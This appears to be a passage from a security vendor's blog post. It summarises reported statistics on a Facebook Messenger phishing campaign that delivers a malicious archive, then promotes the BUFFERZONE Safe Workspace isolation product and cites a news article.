Guardio Labs has shed light on the staggering magnitude of this campaign, noting its vast reach. Their analysis reveals that 7% of all business accounts on Facebook have been in the
crosshairs, with about 0.4% succumbing to the temptation and downloading the malevolent archive.

However, it is important to note that for the malware to spring into action, users must execute the batch file. The exact count of compromised accounts remains a mystery, but given
the scale, it is conceivable the numbers are substantial.

What can we do?

The answer is rooted not in detecting the new attack variation but in its prevention. This is why we created BUFFERZONE® Safe Workspace™.

BUFFERZONE Safe Workspace™ is a comprehensive defense suite anchored in application isolation technology. This arsenal features the Safe Browser, SafeBridge® (boasting Content Disarm and Reconstruction functions), Safe Mail, and Safe Removable (geared towards thwarting USB-based attacks), all fortified with clipboard security. At its core, the Safe Workspace™ deploys a virtual container constructed by a kernel driver. This container bifurcates the operating system into dual logical realms:

Trusted Zone: A non-isolated region connected to the organization’s resources.

Untrusted Zone: Serving as a protective buffer, this zone enables various applications to operate in isolation, cordoned off from the memory, files, registry, and processes of the trusted zone.

Safe Workspace™ is a reliable solution that allows users to access USB (Universal Serial Bus) files, email attachments, and downloaded content. It provides a protective virtual container that isolates potential threats from the broader environment, ensuring that malware cannot reach or compromise sensitive organizational data. The virtual container is periodically deleted and rebuilt; detection engines can scrutinize it for added security. By containing potential threats in isolation, BUFFERZONE prevents malicious entities from proliferating within an organization.

By isolating the browser, all downloaded files are contained, the extracted files are not authorized to run, and the evasive attack will fail. BUFFERZONE® let third party detection scan the virtual isolated container. If part of the attack is detected the file can be quarantined and the environment can be cleaned in a few seconds.

References 

[1] Bill Toulas, Facebook Messenger phishing wave targets 100K business accounts per week  

https://www.bleepingcomputer.com/news/security/facebook-messenger-phishing-wave-targets-100k-business-accounts-per-week/